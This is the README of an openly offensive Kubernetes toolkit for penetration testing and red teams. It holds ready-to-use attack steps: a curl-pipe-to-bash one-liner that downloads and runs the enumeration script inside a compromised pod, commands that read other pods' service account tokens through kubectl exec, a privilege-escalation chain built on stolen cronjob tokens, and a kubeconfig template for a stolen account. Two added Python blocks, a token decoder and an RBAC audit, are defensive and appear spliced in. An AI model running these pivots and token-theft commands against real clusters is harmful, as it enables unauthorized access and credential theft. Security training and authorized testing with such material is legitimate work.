Kubernetes Enumeration Tools for Penetration Testing & Red Team Operations
k8s-enum is a set of Kubernetes security enumeration scripts designed for penetration testers, red teamers, and security researchers. Inspired by LinPEAS, these tools provide comprehensive enumeration with color-coded output highlighting privilege escalation vectors and misconfigurations.
The toolkit includes two specialized scripts:
- `k8s-enum.sh` - External enumeration using kubeconfig files
- `k8s-pod-enum.sh` - Internal enumeration from inside a compromised pod
Use this when you have obtained kubeconfig files or service account tokens and want to enumerate the cluster from your attack machine.

```bash
./k8s-enum.sh --profile <kubeconfig-file>
```

Use this when you've compromised a container/pod and want to enumerate your Kubernetes access from inside the cluster.

```bash
./k8s-pod-enum.sh
```

```bash
# Clone the repository
git clone https://github.com/ahrixia/k8s-enum.sh.git
cd k8s-enum.sh

# Make executable
chmod +x k8s-enum.sh

# Run with your kubeconfig
./k8s-enum.sh --profile ./stolen-kubeconfig.yaml

# Enumerate specific namespace
./k8s-enum.sh --profile ./config.yaml --namespace kube-system

# Enumerate all namespaces
./k8s-enum.sh --profile ./config.yaml --all-ns
```

```bash
# Download directly into compromised pod
curl -O https://raw.githubusercontent.com/ahrixia/k8s-enum.sh/main/k8s-pod-enum.sh
chmod +x k8s-pod-enum.sh
./k8s-pod-enum.sh

# Or one-liner
curl -sL https://raw.githubusercontent.com/ahrixia/k8s-enum.sh/main/k8s-pod-enum.sh | bash
```

Output is color-coded by severity:

| Color | Meaning |
|---|---|
| 🔴 Red (Bold) | CRITICAL - Immediate privilege escalation possible |
| 🔴 Red | HIGH - Significant security finding |
| 🟡 Yellow | MEDIUM - Potential security issue |
| 🟢 Green | LOW/INFO - Informational finding |
| 🔵 Cyan | General information |
k8s-enum.sh (external enumeration) features:

- ✅ Permission Enumeration - `auth can-i --list` with analysis
- ✅ Dangerous Permission Detection - Highlights exec, secrets, impersonate, create pods
- ✅ Namespace Enumeration - Lists all accessible namespaces
- ✅ Pod Enumeration - Lists pods with service account info
- ✅ Service Enumeration - Identifies exposed NodePort/LoadBalancer services
- ✅ Secret Enumeration - Lists accessible secrets
- ✅ ServiceAccount Enumeration - Maps service accounts across namespaces
- ✅ CronJob Analysis - Identifies cronjobs with privileged SAs
- ✅ RBAC Enumeration - Roles, ClusterRoles, Bindings
- ✅ Impersonation Detection - Finds impersonation targets
- ✅ Actionable Recommendations - "What to do next" for each finding

k8s-pod-enum.sh (internal enumeration) features:

- ✅ Auto-detects mounted service account token
- ✅ JWT Token Decoding - Extracts SA name, namespace, pod info
- ✅ Works without kubectl - Falls back to curl API calls
- ✅ Container Escape Vectors - Checks docker.sock, host mounts, capabilities
- ✅ Cloud Metadata Access - AWS/GCP/Azure IMDS checks
- ✅ Network Enumeration - Interfaces, ports, internal services
- ✅ Privilege Escalation Paths - Identifies privesc opportunities
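The "JWT Token Decoding" step above reads the payload of the mounted service account token. The following is an added example, not code from the k8s-enum project: it shows both claim layouts a Kubernetes SA token can have (legacy secret-based and bound projected), so that a token found in a log, repository or incident artefact can be traced back to its namespace, service account and pod for rotation. The sample token is constructed inline with a dummy signature; no signature verification is performed.

```python
import base64
import json

def b64url_decode(segment):
    """Base64url without padding, as JWT segments are encoded."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def describe_sa_token(token):
    """Identify the owner of a service-account JWT from its payload claims.

    Handles the legacy secret-based token (flat `kubernetes.io/serviceaccount/*`
    claims, no expiry) and the bound projected token (nested `kubernetes.io` claim
    that also names the pod). The signature is not verified here.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a JWT")
    claims = json.loads(b64url_decode(parts[1]))
    bound = "kubernetes.io" in claims
    if bound:
        k8s = claims["kubernetes.io"]
        namespace = k8s.get("namespace")
        sa = k8s.get("serviceaccount", {}).get("name")
        pod = k8s.get("pod", {}).get("name")
    else:
        namespace = claims.get("kubernetes.io/serviceaccount/namespace")
        sa = claims.get("kubernetes.io/serviceaccount/service-account.name")
        pod = None
    return {"subject": claims.get("sub"), "bound": bound, "namespace": namespace,
            "service_account": sa, "pod": pod, "expires": claims.get("exp")}

def make_unsigned_token(claims):
    """Build a JWT with a dummy signature; used only to construct sample input."""
    header = b64url_encode(json.dumps({"alg": "RS256", "kid": "sample"}).encode())
    return f"{header}.{b64url_encode(json.dumps(claims).encode())}.c2lnbmF0dXJl"

# Constructed sample: a bound projected token as mounted into a pod (not a real token).
SAMPLE_BOUND = make_unsigned_token({
    "aud": ["https://kubernetes.default.svc"], "exp": 1800000000,
    "iss": "https://kubernetes.default.svc.cluster.local",
    "kubernetes.io": {"namespace": "payments",
                      "pod": {"name": "api-7c9d4f-x2k8p"},
                      "serviceaccount": {"name": "api-runner"}},
    "sub": "system:serviceaccount:payments:api-runner",
})

if __name__ == "__main__":
    print(describe_sa_token(SAMPLE_BOUND))
```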
The scripts specifically look for these dangerous permissions:
| Permission | Risk Level | Impact |
|---|---|---|
| `pods/exec` create | CRITICAL | Remote code execution in any pod |
| `secrets` get/list | CRITICAL | Credential extraction |
| `pods` create | CRITICAL | Container escape via privileged pod |
| `serviceaccounts` impersonate | CRITICAL | Privilege escalation |
| `rolebindings` create | CRITICAL | Self-privilege escalation |
| `serviceaccounts/token` create | HIGH | Token generation for other SAs |
| `cronjobs` create | HIGH | Persistence mechanism |
| `daemonsets` create | HIGH | Cluster-wide code execution |
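The table above as a small RBAC audit, added here as an example and not part of the k8s-enum scripts: it parses the output of `kubectl auth can-i --list` (a constructed sample is embedded), maps each granted rule onto the table's severity, expands `*` wildcards, and records when a grant is narrowed by `resourceNames`, which is the detail a reviewer needs when deciding whether a service account's role is over-privileged.

```python
import re

# Risk table from the README, keyed by (resource, verb).
DANGEROUS = {
    ("pods/exec", "create"): ("CRITICAL", "Remote code execution in any pod"),
    ("secrets", "get"): ("CRITICAL", "Credential extraction"),
    ("secrets", "list"): ("CRITICAL", "Credential extraction"),
    ("pods", "create"): ("CRITICAL", "Container escape via privileged pod"),
    ("serviceaccounts", "impersonate"): ("CRITICAL", "Privilege escalation"),
    ("rolebindings", "create"): ("CRITICAL", "Self-privilege escalation"),
    ("serviceaccounts/token", "create"): ("HIGH", "Token generation for other SAs"),
    ("cronjobs", "create"): ("HIGH", "Persistence mechanism"),
    ("daemonsets", "create"): ("HIGH", "Cluster-wide code execution"),
}

# One `auth can-i --list` row: resource (empty for non-resource URLs) + 3 bracketed columns.
ROW = re.compile(r"^(\S*)\s+\[(.*?)\]\s+\[(.*?)\]\s+\[(.*?)\]\s*$")

def parse_can_i_list(text):
    """Yield (resource, resource_names, verbs) for each resource rule in the output."""
    for line in text.splitlines()[1:]:        # first line is the column header
        m = ROW.match(line)
        if not m or not m.group(1):           # skip blank and non-resource URL rows
            continue
        resource, _urls, names, verbs = m.groups()
        # Drop the API group (cronjobs.batch -> cronjobs); keep subresources; "*.*" -> "*".
        yield resource.split(".")[0], names.split(), verbs.split()

def audit(text):
    """Return (risk, resource, verb, impact, scope) tuples, CRITICAL first."""
    findings = set()
    for resource, names, verbs in parse_can_i_list(text):
        for (d_res, d_verb), (risk, impact) in DANGEROUS.items():
            if resource in ("*", d_res) and ("*" in verbs or d_verb in verbs):
                # resourceNames in the role limits the grant to the named objects.
                scope = "restricted to " + ",".join(names) if names else "all objects"
                findings.add((risk, d_res, d_verb, impact, scope))
    return sorted(findings, key=lambda f: (f[0] != "CRITICAL", f[1], f[2]))

# Constructed sample output; the secrets grant is scoped by resourceNames.
SAMPLE = """\
Resources        Non-Resource URLs   Resource Names   Verbs
pods/exec        []                  []               [create]
secrets          []                  [db-creds]       [get]
cronjobs.batch   []                  []               [get list watch]
                 [/healthz]          []               [get]
"""

if __name__ == "__main__":
    for risk, res, verb, impact, scope in audit(SAMPLE):
        print(f"{risk:8} {res} {verb}: {impact} ({scope})")
```

Feed it real output with `kubectl auth can-i --list > rules.txt` and `audit(open("rules.txt").read())`; remember that the listing reflects the namespace of the current context, so cluster-wide review means one run per namespace or a check of the ClusterRoleBindings directly.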
The pod script also checks for these container escape vectors:

- Docker socket (`/var/run/docker.sock`)
- Host filesystem mounts (`/host`, `/hostfs`, `/rootfs`)
- Privileged container detection
- Host namespace access (PID, Network, IPC)
- Linux capabilities analysis
- Cloud metadata service access
```bash
# You obtained a kubeconfig from a developer's laptop
./k8s-enum.sh --profile ./dev-kubeconfig.yaml

# Check what the service account can do
# If it finds impersonation, try:
kubectl --kubeconfig=./dev-kubeconfig.yaml auth can-i --list \
  --as=system:serviceaccount:default:admin-sa
```

```bash
# Inside a compromised container
./k8s-pod-enum.sh

# If it finds pods/exec permission, pivot:
kubectl exec -it other-pod -- cat /var/run/secrets/kubernetes.io/serviceaccount/token
```

```bash
# 1. Enumerate with low-priv SA
./k8s-enum.sh --profile ./low-priv.yaml

# 2. Find cronjob with higher-priv SA
kubectl get cronjob -o yaml | grep serviceAccount

# 3. Exec into cronjob pod, steal token
kubectl exec -it cronjob-pod -- cat /var/run/secrets/kubernetes.io/serviceaccount/token

# 4. Create new kubeconfig with stolen token
# 5. Re-enumerate with higher privileges
./k8s-enum.sh --profile ./high-priv.yaml
```

k8s-enum.sh flags:

| Flag | Description |
|---|---|
| `--profile, -p` | Path to kubeconfig file (required) |
| `--namespace, -n` | Target specific namespace |
| `--all-ns` | Enumerate all namespaces |
| `--quick` | Skip slow checks (RBAC, impersonation) |
| `--help, -h` | Show help message |

k8s-pod-enum.sh flags:

| Flag | Description |
|---|---|
| `--api-server, -a` | Override API server URL |
| `--help, -h` | Show help message |
When you extract a service account token, create a kubeconfig:

```yaml
apiVersion: v1
kind: Config
clusters:
- name: target-cluster
  cluster:
    server: https://<API-SERVER>:443
    certificate-authority-data: <BASE64-CA-CERT>
users:
- name: stolen-sa
  user:
    token: <STOLEN-TOKEN>
contexts:
- name: attack-context
  context:
    cluster: target-cluster
    user: stolen-sa
    namespace: <NAMESPACE>
current-context: attack-context
```

Or use the one-liner:

```bash
kubectl config set-cluster k8s --server=https://<IP>:443 --certificate-authority=ca.crt
kubectl config set-credentials user --token=$(cat token)
kubectl config set-context ctx --cluster=k8s --user=user
kubectl config use-context ctx
```

These tools were developed and used during the K8s-RTA (Kubernetes Red Team Analyst) Exam.
These tools are intended for authorized security testing only. Only use these scripts on systems you have explicit permission to test. Unauthorized access to computer systems is illegal.
The author is not responsible for any misuse or damage caused by these tools.
This project is licensed under the MIT License - see the LICENSE file for details.
If you find this useful, give it a ⭐!